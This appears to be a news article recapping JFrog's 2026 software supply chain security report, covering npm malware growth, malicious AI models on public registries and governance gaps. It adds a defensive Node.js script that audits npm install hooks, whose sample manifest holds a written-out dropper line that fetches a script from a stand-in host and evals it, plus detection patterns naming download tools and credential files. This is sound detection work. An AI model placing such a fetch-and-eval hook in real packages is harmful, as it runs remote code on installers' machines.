JFrog report recaps a tumultuous year in supply chain security
Calendar year 2025 not only broke records for code package proliferation; it also redefined the foundational architecture of the software supply chain. Bad actors then turned this into a high-value target.
For CISOs and security professionals, the structural shifts driven by AI are forcing a reckoning: the security perimeter is no longer just the code they write or the open-source dependencies they pull. It’s now the vast, ungoverned realm of AI models and agentic development tools themselves.
According to the 58-page JFrog Software Supply Chain Security State of the Union 2026, released this week, the threat landscape is expanding in all directions. JFrog warns that AI is “no longer an emerging consideration in the software supply chain. It is the supply chain.”
The data confirms an immediate crisis, showing that risk is rapidly expanding across dependencies, binaries, and newly introduced AI artifacts. Existing security controls cannot keep pace. The report aims to motivate security decision-makers to move from reactive patching to systemic control of software risk.
“The software attack surface has fundamentally shifted upstream; attackers are actively weaponizing IDE extensions, MCP servers, open-source binaries, and developer tools to launch instantaneous attacks on first-time usage, using the developer’s workstation,” JFrog CISO Paul Davis tells The New Stack.
“This shift has created a fundamental disconnect between executive perception of how well they think they are protected and actual operational reality. And it’s not just traditional software development.
“While 97% of organizations claim they have certified AI governance of the components they use to build new AI-enabled solutions, nearly a fifth have absolutely no active enforcement over the intelligent tools operating inside their developers’ workflows. Governance that exists only on paper isn’t a security control — it’s a dangerous assumption.”
Standout data points from the report:
- The 2026 threat landscape is expanding in all directions. While 2025 was the most dangerous year on record for npm users, a massive new attack surface of AI models and agentic developer tools opened up alongside it. Malicious npm packages (npm being the default package manager for JavaScript and Node.js) are infected libraries published to the Node Package Manager registry. Once installed, they immediately execute malicious scripts to steal credentials, deploy backdoors, or inject wallet-drainers.
- Governance cannot keep up with AI development. While enterprises are rapidly adopting AI development tools, models, and protocols, governance guardrails for these new surfaces remain stuck in neutral. AI is no longer an emerging consideration in the software supply chain; it is becoming the supply chain.
- Not all reported vulnerabilities are what they appear. Volume-based triage is failing security teams. Having more CVEs (common vulnerabilities and exposures) to chase doesn’t mean more actual risk; it means more noise.
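The install-time execution described in the first bullet is the mechanism defenders most need to see concretely. What follows is an added example, not code from the JFrog report or from this article: a Node.js script that audits package.json manifests for the lifecycle hooks npm runs automatically when a dependency is installed (preinstall, install, postinstall) and flags commands that match a handful of dropper heuristics. The sample manifests and the indicator patterns are constructed for illustration and are not JFrog detection rules.

```javascript
// Added example (not from the JFrog report or The New Stack article).
// Audits package.json manifests for install-time lifecycle scripts, which
// npm executes automatically during `npm install`. Sample manifests and
// indicator patterns below are constructed for illustration.

// Hooks npm runs automatically when a dependency is installed from the registry.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// Heuristic indicators of an install-time dropper. These are triage signals,
// not proof: many legitimate packages compile native code or fetch prebuilt
// binaries in postinstall, so hits should be reviewed rather than auto-blocked.
const INDICATORS = [
  { label: 'remote download', re: /\b(curl|wget|Invoke-WebRequest)\b/i },
  { label: 'inline JS eval', re: /\bnode\s+(-e|--eval)\b|\beval\(/ },
  { label: 'encoded payload', re: /base64|fromCharCode|\\x[0-9a-f]{2}/i },
  { label: 'shell/process spawn', re: /child_process|\bsh\s+-c\b|\bbash\b/ },
  { label: 'secret access', re: /\.npmrc|\.ssh|AWS_SECRET|GITHUB_TOKEN/i },
];

// Inspect one package.json object: return every hook that would fire on
// install, each with the indicator labels whose pattern matched its command.
function auditManifest(pkg) {
  const scripts = pkg.scripts || {};
  const hooks = INSTALL_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string')
    .map((hook) => {
      const command = scripts[hook];
      const indicators = INDICATORS
        .filter(({ re }) => re.test(command))
        .map(({ label }) => label);
      return { hook, command, indicators };
    });
  const flagged = hooks.some((h) => h.indicators.length > 0);
  return { name: pkg.name, version: pkg.version, hooks, flagged };
}

// Audit a list of manifests (e.g. every node_modules/*/package.json) and keep
// only packages that run code on install, flagged ones first.
function auditAll(manifests) {
  return manifests
    .map(auditManifest)
    .filter((r) => r.hooks.length > 0)
    .sort((a, b) => Number(b.flagged) - Number(a.flagged));
}

// Render audit results as plain report lines.
function formatReport(results) {
  const lines = [];
  for (const r of results) {
    lines.push(`[${r.flagged ? 'FLAG' : 'info'}] ${r.name}@${r.version}`);
    for (const h of r.hooks) {
      lines.push(`  ${h.hook}: ${h.command}`);
      if (h.indicators.length) lines.push(`    indicators: ${h.indicators.join(', ')}`);
    }
  }
  return lines;
}

// Constructed sample manifests (hypothetical package names, not real packages).
const SAMPLES = [
  { name: 'left-pad-clone', version: '1.0.0', scripts: { test: 'node test.js' } },
  { name: 'native-addon', version: '2.3.1', scripts: { install: 'node-gyp rebuild' } },
  {
    name: 'totally-legit-utils',
    version: '0.0.9',
    scripts: {
      // Classic dropper shape: fetch a remote script and eval it in node.
      postinstall: 'curl -s https://example.invalid/p | node -e "eval(require(\'fs\').readFileSync(0,\'utf8\'))"',
    },
  },
];

console.log(formatReport(auditAll(SAMPLES)).join('\n'));
```

The blunt mitigation for this whole class is to stop npm from running lifecycle scripts at all (`ignore-scripts=true` in `.npmrc`, or `npm install --ignore-scripts`) and then explicitly `npm rebuild` the few packages, such as native add-ons, that genuinely need a build step; the audit above tells you which packages those are before anything executes on a developer workstation.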
The sheer velocity of code ingestion is a major factor driving this expansion. In 2025, 11.7 million new packages flooded software supply chains, marking an astounding 67% increase from the previous year. This isn’t just a sudden jump in volume; it’s a structural realignment of the ecosystem, JFrog said.
The report notes that npm officially overtook Apache Maven as the most-used package ecosystem by traffic, with 400,000 new packages compared to Maven’s 98,000. In a parallel move signaling the industry’s shift toward modern data science and machine learning, PyPI passed YUM, indicating that AI/ML workload issues are displacing legacy infrastructure concerns.
This change in package preference coincided with what the report calls the “most dangerous year on record for npm users.” The malicious activity was not incremental; it blew up by a jaw-dropping 451%. Clearly, bad actors have found a new niche.
Attackers launched three major hijack campaigns that resulted in more than 2 million compromised downloads and 171,592 unique instances of malicious npm packages, JFrog said. This escalation underscores how reliance on large, publicly accessible registries, particularly those powering front-end and dynamic workloads, presents a critical, exploited vulnerability for software makers.
Security experts are way behind the eight-ball on this one.
Notable long-term risk emerges
A significant long-term risk stems from the AI adoption curve outstripping governance capabilities, JFrog said. While enterprises are rapidly integrating AI development tools, models, and protocols, governance frameworks for these new attack surfaces remain “nascent or aspirational,” the report says. The numbers highlight a profound chasm: 41% of enterprises are actively using AI and ML libraries (the software packages that connect applications to AI models and services), up from 34% in 2024. Moreover, the average organization is now managing 47% more of these packages than last year, as teams move rapidly from relying on a single AI service to building across several services simultaneously.
The danger, JFrog said, is compounded by engineering teams’ readiness to pull models directly from public sources. A concerning 53% of organizations are pulling AI models straight from public registries. Furthermore, 53% of organizations self-host AI models in some form, often sourcing them from platforms such as Hugging Face and similar registries.
The risks of this practice are evidenced by the detection of 495 malicious models on these public registries, JFrog said. Yet, in a testament to the governance disconnect, a whopping 97% of enterprises claim to have certified model governance in place, a figure the report’s malicious model data sharply contradicts.
Operational burdens cited as a major problem
The operational burden of modern security further illustrates the problem. Nearly half (48%) of enterprises said they require a week or more to generate audit-proof compliance. This lack of agility in demonstrating compliance is symptomatic of legacy, siloed security practices that cannot keep pace with the speed of AI-driven development, JFrog said.
The high-level message from the JFrog report: The attack surface has metastasized. Software makers are contending with a perfect storm — an unprecedented volume of packages, an onslaught of malicious dependencies, and an AI gold rush in which speed has sidelined security governance. Moving forward requires a data-justified shift from simply managing CVE noise to strategically controlling the entire software risk surface, especially as AI artifacts dominate the supply chain narrative.
JFrog serves as the system of record for thousands of global enterprises and more than 80% of the Fortune 100. The JFrog Software Supply Chain Platform has insights across billions of software artifacts. This report is the resulting analysis of that data, combined with independent vulnerability research by the JFrog Security Research team and commissioned third-party survey responses from 1,508 security, development, and operations professionals across eight countries.